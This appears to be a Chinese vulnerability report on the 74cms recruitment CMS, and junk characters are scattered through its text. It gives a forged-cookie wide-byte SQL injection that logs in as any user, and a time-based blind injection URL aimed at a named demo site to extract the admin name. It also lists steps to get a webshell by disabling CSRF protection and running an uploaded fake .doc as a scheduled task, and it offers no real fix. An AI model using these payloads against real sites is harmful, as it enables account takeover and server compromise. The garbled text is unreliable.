0x1 任意用户登录2 @0 E8 W1 j; Z1 J
/ ~$ ^# p1 L @
0x2 盲注
6 g3 @ m* z) E& }9 V
0 Z# R: y* A7 U1 c% Z1 E 0x3 后台拿shell! n. i+ A9 C7 u( k( W0 v3 n
2 x; h* Q8 w, _+ p z 0x4 随机函数问题* h) Q% f( m$ n( M' u+ X
% y6 V0 |" I9 f5 a( s4 S8 {. ~% a$ }
详细说明:
& L: q& a: R& S4 Z) t( J1 k6 `
* Z5 g0 c) S2 t( k# F! Z 0x1 任意用户登录! y5 U5 r d; n1 J% k
0 K8 g5 _9 S6 @* J4 j& L user/login.php8 V2 |" A! A! ^- T
* I# C- y& ~3 _
elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])
# W b8 O% \0 g6 _$ c/ o0 l( |4 w" {) p. Q
{4 j# l) c3 V. N: \
; q$ i' r0 R8 w$ ~+ A1 u if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password']))/ Z, U# D8 ? u, b( r
1 Q- n8 Q/ e# E1 p" J4 H7 n' G
{% | c- P, c: X: q8 B) j- v2 V
) c O& i- z. D4 Z3 W update_user_info($_COOKIE['QS']['uid'],false,false);
' d/ m; e5 {8 d" d. ^
% c p- n3 c+ [3 Z. B" _ header("Location:".get_member_url($_SESSION['utype']));
7 m1 e) b5 u$ w6 h
$ i- D9 Q) V: l( R( }. w, m' x }5 ]0 D+ g3 B2 ]9 J- i# I& V
4 V# V! E3 \. Q) z6 G) _' L
else
G; [; `) v/ R8 I- j# H2 z
3 x9 f2 T# {" [+ e3 f {5 j; Q! Z. I' q$ D3 t
7 S! E- i. p. J g
unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION["openid"]);
/ f6 M+ `5 L# c$ ]4 C; H. u6 l
f% F1 \4 Y/ d$ } _ setcookie("QS[uid]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain);/ g% V0 S9 C/ v: d4 O
% t+ ]8 U, v5 E; O- j4 f: W7 J setcookie('QS[username]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain);" y [+ G* y$ e( Z
- P: v5 A3 W& h% c
setcookie('QS[password]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain);: ~/ k- s! r' o% W
) J, @5 F, |, e5 D
setcookie("QS[utype]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain);
: R, B2 i$ z0 M& P1 U
5 C( O7 m- M) X t2 F' G header("Location:".url_rewrite('QS_login'));
! t, T8 s# {* m* Z0 I: F# [
. f% d2 E+ k! J, u/ i- V% m }' U& J; S b+ P8 }
6 e; E3 G, }. q: n t }
3 X6 s/ U/ K5 d S3 V2 {% b. N0 Z0 ~
include/fun_user.php
" l+ T% Q& W0 D" \: Q; P7 r8 n
3 M! F6 s2 O% c# {5 ~/ A3 h; v$ x( g1 g //检测COOKIE
0 M8 h) y: X, z- v
1 m* R. K1 b! [: i% v- q( ^ function check_cookie($name,$pwd){
+ H4 W! H# o* h* p3 G# f# ?) W, ?/ g( x* F) [& R. I
global $db;' q2 d7 F/ B3 R1 j7 T% s
( M$ l* W4 a; a$ z$ J9 G; ?; q
$row = $db->getone("SELECT COUNT(*) AS num FROM ".table('members')." WHERE username='{$name}' and password = '{$pwd}'");
3 i3 O8 B# V" D8 V3 u. g
! g/ ? O4 X( K* i9 e if($row['num'] > 0)
" o- J( N, W9 |, h% u" J
* ]0 a" U& ?3 w {" V. [& {( M0 i p7 X Q% r
' _* l' W4 G# E7 ^& | return true;
: ~; ^4 h7 _5 f0 o. m( Y9 t& S7 R- J% ~ z8 E) d% T( r9 V
}else{
6 y" x, Q: j" k7 ~) H* Z2 M3 A: m! f; I% n
return false;+ j) x% @2 H# g2 |& j! h+ F8 e
- R! A0 R/ M# o0 i# q. j% N6 k
}
. @1 z1 A0 M9 O0 {% b2 y8 [: S& H) B5 T5 x0 k
}0 W `6 r. [" Y( @ S1 Q( D a
6 s) \, X' b u. s$ y/ x 构造cookie如下
2 [; H, |7 o5 H" i
6 s- G4 w# k& F0 c' X- ~/ f QS[uid] 29 A+ I6 p) y- n/ ?: H$ \7 V
7 q) ?2 u8 }4 g1 A QS[utype] 16 E7 S+ i/ E8 X
) M" B* z% A$ E8 Q0 A
QS[password] 1111111111111111111119 W3 h7 _5 k' s7 W$ h* p1 Q7 {. b! z
% X/ m3 Y" J/ K9 n
QS[username]%bf%27 or 1=1 %23 C, O; Y$ V. s/ m r" U
8 i) W: J. `& R7 K) ~" [
uid 为假冒用户的ID utype为用户类型password任意* _1 q+ L0 s+ ^, G2 V& L
1 A2 Y0 k; w- ^3 N/ J9 n5 N
0x2 盲注
) F) |! n( V: L3 H4 q3 w! s* e! `" U
http://demo32.74cms.com//resume/resume-list.php?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%236 h/ n% `6 |! w7 a1 G5 Z9 x
1 F) N6 t" K$ v- d) i4 ^ 上面两个都是宽字节注入,如果你能猜出管理员密码,还能解出双重md5的话,还能猜出后台路径,继续看下面/ h) G0 w L' p. T* d
) \9 a- a4 v- d; W; g2 w" s2 y 0x3 后台拿shell5 l4 E f/ v" ?; \. h
/ i4 l! r3 \, C+ R' a P 1.先关闭csrf防御功能0 ^7 i+ L! I0 V% p. j3 `
0 d, z5 b! c8 V6 t* L, O) h I 2.在hr工具箱中添加一个伪造的doc,内容为,记下路径data/hrtools/2012/06/1339941553308.doc
# a2 P! Y% z8 D2 X8 H* j/ q" g' W+ {2 r
3.在工具-计划任务中添加任务,脚本任务填../../data/hrtools/2012/06/1339941553308.doc& `! d- o- E9 I8 e
' g7 p- Y8 }9 y, h
4.然后执行
% _7 g6 w! W' `" D; `+ O9 [8 s" i1 i! ^9 i, Y0 w4 a8 X" e# P
0x4 随机函数问题(几乎可以无视,纯属个人YY)3 j7 X( ~0 d$ n% R
' i: ~% m8 i6 q/ N7 F/ {
在admin_common.fun.inc.php中有个$QS_pwdhash是在安装的时候赋值的,只要能猜出就可已不用解双重md5了。
6 \0 k! P: `# p) U( ^* D+ Q
6 X& X5 }( g# y. H5 M1 ]; {, M 这个$QS_pwdhash是由randstr生成( G( z) v) v: d+ |. P l1 O$ [
3 q- ?2 h# B3 C: k
function randstr($length=6)' O4 _! U% ]$ S( ?/ l. v: [
% e& j& G* W# E+ i N& Q9 ]9 O# w- x
{, c4 k! `+ P7 Z* E+ k
7 Q) ]. G) S0 i $hash='';7 ?) C) |2 { h- `; F" b' Q
5 I! t+ A$ l5 c
$chars= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz@#!~?:-=';% j! [8 k1 t0 U" t* y
* p6 f* `1 r7 M! t# ^1 U $max=strlen($chars)-1;; D8 y6 M2 N3 `" F
# A* C: M# p+ I0 }0 u) a5 l: K4 a, H mt_srand((double)microtime()*1000000);7 ]( e+ t, {9 O4 T) ]9 v
, h. i3 n/ T( U* Y for($i=0;$i<$length;$i++) {
5 p: V3 c& g* g8 n5 Y" K: a4 |. H! O8 W( x3 t$ R: B
$hash.=$chars[mt_rand(0,$max)];
# ~4 {0 R g0 _5 x' M7 ~
* ~( n4 I e! M( d3 K$ _" g }1 e: g0 }) b+ m. w& K# @7 C, y, U% G
* d( {8 k* J, T- ~8 ~- c" ]
return $hash;
: {" k- e+ `; p8 T4 l5 _7 s q, \. y- j( s2 J
}; P) |9 ]2 t" B
% l, P# U' z& u# I/ G+ ]! y 生成长度为6的随机数,mt_srand()播种一样,就会得到一样的随机数,所以我们最多要猜1000000次就可以了(蛋疼)
) y: \" L1 L, R$ ^# T1 Q3 R$ C& k7 F
漏洞证明:# e3 m* \2 v" w& T4 ~
1 L- Z# F, j- m$ K2 E; E* o( i4 m3 i/ x 修复方案:
n$ D# Y2 }- s* y' ]+ a" y7 l9 K0 J A6 f
do it yourself~# C: v' {9 m, U" o
9 @- K1 f# [ N0 l) b1 A& q解决一切网站安全,湖盟云防火墙:hnhack.com |
